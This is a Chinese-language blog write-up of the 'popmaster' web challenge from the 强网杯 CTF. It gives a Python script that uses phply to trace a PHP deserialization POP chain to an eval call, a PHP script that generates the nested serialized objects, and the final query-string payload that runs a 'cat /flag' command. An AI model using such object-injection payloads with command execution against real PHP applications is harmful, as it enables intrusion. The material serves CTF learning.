强网被-popmaster

popmaster

exp如下(node为节点):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
import nose
from phply import phplex
from phply.phpparse import  make_parser
from  phply.phpast import *
import pprint
parser = make_parser() 
func_name = "BFda7w"
con = open("C:\\Users\\86130\\Desktop\\popmaster.php").read()
lexer = phplex.lexer.clone()
lexer.filename = None
output = parser.parse(con, lexer=lexer) #输出抽象语法树
functions = {}
i = 0
for out in output:
    class_name = out.name
    for node in out.nodes:
        if(type(node) == Method):
            functions[node.name] = out
target = functions[func_name]
# print(target)
# 强赋值函数直接跳过

skip_func = ["F03wGk", "c3BsKT" ,"C2S8YY" ,"g5uQo2" ,"mdNq2Z" ,"CpBMKR" ,"xYClcr","RhTsLz","rivyS9","sIm1Q9","qMKDLp","dgkACH","wWVqKa"]#这个地方需要自己测试找出来不符合的函数

pop_chain = []
pop_chain.append(func_name)
e = False
while(e is False):
    for node in target.nodes:
        if(type(node) == Method):
            if node.name == func_name:
                for subnode in node.nodes:
                    if type(subnode) == MethodCall:
                        # print(subnode)
                        if(subnode.name in skip_func):
                            continue
                        target = functions[subnode.name]
                        func_name = subnode.name
                        pop_chain.append(func_name)
                        break
                    if(type(subnode) == If):
                        # print(subnode)
                        if type(subnode.node) == MethodCall :
                        # print(subnode.node.name)
                            if( subnode.node.name in skip_func):
                                continue
                            target = functions[subnode.node.name]
                            func_name = subnode.node.name
                            pop_chain.append(func_name)
                            break
                    if (type(subnode) == Eval):
                        e = True
print(pop_chain)
# pop_chain = ['BFda7w', 'kfsxbo', 'bbT2V6', 'LXHQUY', 'LQZfK6', 'Yrum3T', 'i5bTYI', 'afD92G', 'qqhftt', 'M7qPV2', 'PUDbGz', 'xG4zKc',
#  'HgZWAg', 'HPwuDl', 'Vhw4qk', 'WLprHX', 'UZ6O8X', 'wCihxm', 'bUm181', 'Rcx3e8', 'pBcmHG', 'yv2r6Y', 'Nq02C8']
for pop in pop_chain:
    print("class " + functions[pop].name + "{")
    for node in functions[pop].nodes:
        if(type(node) == ClassVariables):
            for subnode in node.nodes:
                print("public " + subnode.name + ';')
                print("public function __construct(){")
                if i+1 == len(pop_chain):
                     print("")
                else:
                    print("$this->" + subnode.name[1:] + "= new " + functions[pop_chain[i + 1]].name + "();")
                print("}")
    print("}")
    i += 1
    if i == len(pop_chain):
        break
# ['BFda7w', 'kfsxbo', 'rivyS9', 'mdNq2Z', 'LHl965', 'E0eLx8', 'DuLIOe', 'WCe4Tq', 'TmAYUb', 'LAekG5', 'r2q0UF', 'C2S8YY', 'g5uQo2',
#  'KxPhgA', 'lsA527', 'LRu117', 'MFpxq9', 'xafXFm', 'GsVAVW', 'dGcfBB', 'YY6r37', 'gH4fYy', 'U6xl6Q', 'eRt60t']
# F03wGk c3BsKT C2S8YY g5uQo2 mdNq2Z CpBMKR xYClcr rivyS9 sIm1Q9
# qMKDLp dgkACH
# qqhftt qMKDLp  M7qPV2 dgkACH xG4zKc
# ['BFda7w', 'kfsxbo', 'bbT2V6', 'LXHQUY', 'LQZfK6', 'Yrum3T', 'i5bTYI', 'afD92G', 'qqhftt', 'M7qPV2', 'PUDbGz',
#  'dgkACH', 'S8CRbp', 'g0Evp1', 'FZp1N3', 'xkFzHK', 'gcVOmb', 'ozDZgT', 'gHWISY', 'c7rQmp', 'HwiCXY', 'OfIYHw', 'foTwm3']
# ['BFda7w', 'kfsxbo', 'bbT2V6', 'LXHQUY', 'LQZfK6', 'Yrum3T', 'i5bTYI', 'afD92G', 'qqhftt', 'M7qPV2', 'PUDbGz', 'xG4zKc',
#  'HgZWAg', 'HPwuDl', 'Vhw4qk', 'WLprHX', 'UZ6O8X', 'wCihxm', 'bUm181', 'Rcx3e8', 'pBcmHG', 'wWVqKa', 'qM2mnx']


得到pop链,构造payload打

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
<?php
class TPmYmu{
public $qfDgtGD;
public function __construct(){
$this->qfDgtGD= new z3w6kL();
}
}
class z3w6kL{
public $X5XSpPz;
public function __construct(){
$this->X5XSpPz= new olTmkb();
}
}
class olTmkb{
public $tTEiXpd;
public function __construct(){
$this->tTEiXpd= new Moag8l();
}
}
class Moag8l{
public $D8ea5Xn;
public function __construct(){
$this->D8ea5Xn= new QcHqVE();
}
}
class QcHqVE{
public $XHhuV4y;
public function __construct(){
$this->XHhuV4y= new hCG6ag();
}
}
class hCG6ag{
public $cYnq47g;
public function __construct(){
$this->cYnq47g= new EYyxSm();
}
}
class EYyxSm{
public $A7icng3;
public function __construct(){
$this->A7icng3= new CDF5aP();
}
}
class CDF5aP{
public $KUxwPnq;
public function __construct(){
$this->KUxwPnq= new a1rktQ();
}
}
class a1rktQ{
public $G2ZqPlg;
public function __construct(){
$this->G2ZqPlg= new bPC9aV();
}
}
class bPC9aV{
public $mUtXpNL;
public function __construct(){
$this->mUtXpNL= new lNHRgw();
}
}
class lNHRgw{
public $iI0ggvd;
public function __construct(){
$this->iI0ggvd= new uhsLTo();
}
}
class uhsLTo{
public $V4cm8RE;
public function __construct(){
$this->V4cm8RE= new xmFnqe();
}
}
class xmFnqe{
public $XVKtQaL;
public function __construct(){
$this->XVKtQaL= new ygWYP5();
}
}
class ygWYP5{
public $BeaCQ8a;
public function __construct(){
$this->BeaCQ8a= new kU9NTw();
}
}
class kU9NTw{
public $Rc3QaRn;
public function __construct(){
$this->Rc3QaRn= new gyRrwz();
}
}
class gyRrwz{
public $ykDFgZf;
public function __construct(){
$this->ykDFgZf= new Q2GEHp();
}
}
class Q2GEHp{
public $GgRUaWA;
public function __construct(){
$this->GgRUaWA= new cnxShX();
}
}
class cnxShX{
public $lKlVzwp;
public function __construct(){
$this->lKlVzwp= new MyFOP4();
}
}
class MyFOP4{
public $aIr6pnl;
public function __construct(){
$this->aIr6pnl= new TWKFWY();
}
}
class TWKFWY{
public $iMX9NnG;
public function __construct(){
$this->iMX9NnG= new ogz6Dr();
}
}
class ogz6Dr{
public $ThhObgx;
public function __construct(){
$this->ThhObgx= new QaCgIg();
}
}
class QaCgIg{
public $gpW7aFB;
public function __construct(){
$this->gpW7aFB= new Zg0xg5();
}
}
class Zg0xg5{
public $p4epegQ;
public function __construct(){

}
}
echo serialize(new TPmYmu());
?>

payload为

?pop=O:6:"TPmYmu":1:{s:7:"qfDgtGD";O:6:"z3w6kL":1:{s:7:"X5XSpPz";O:6:"olTmkb":1:{s:7:"tTEiXpd";O:6:"Moag8l":1:{s:7:"D8ea5Xn";O:6:"QcHqVE":1:{s:7:"XHhuV4y";O:6:"hCG6ag":1:{s:7:"cYnq47g";O:6:"EYyxSm":1:{s:7:"A7icng3";O:6:"CDF5aP":1:{s:7:"KUxwPnq";O:6:"a1rktQ":1:{s:7:"G2ZqPlg";O:6:"bPC9aV":1:{s:7:"mUtXpNL";O:6:"lNHRgw":1:{s:7:"iI0ggvd";O:6:"uhsLTo":1:{s:7:"V4cm8RE";O:6:"xmFnqe":1:{s:7:"XVKtQaL";O:6:"ygWYP5":1:{s:7:"BeaCQ8a";O:6:"kU9NTw":1:{s:7:"Rc3QaRn";O:6:"gyRrwz":1:{s:7:"ykDFgZf";O:6:"Q2GEHp":1:{s:7:"GgRUaWA";O:6:"cnxShX":1:{s:7:"lKlVzwp";O:6:"MyFOP4":1:{s:7:"aIr6pnl";O:6:"TWKFWY":1:{s:7:"iMX9NnG";O:6:"ogz6Dr":1:{s:7:"ThhObgx";O:6:"QaCgIg":1:{s:7:"gpW7aFB";O:6:"Zg0xg5":1:{s:7:"p4epegQ";N;}}}}}}}}}}}}}}}}}}}}}}}&argv=sytem("cat /flag");//

ctf
ctf web

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!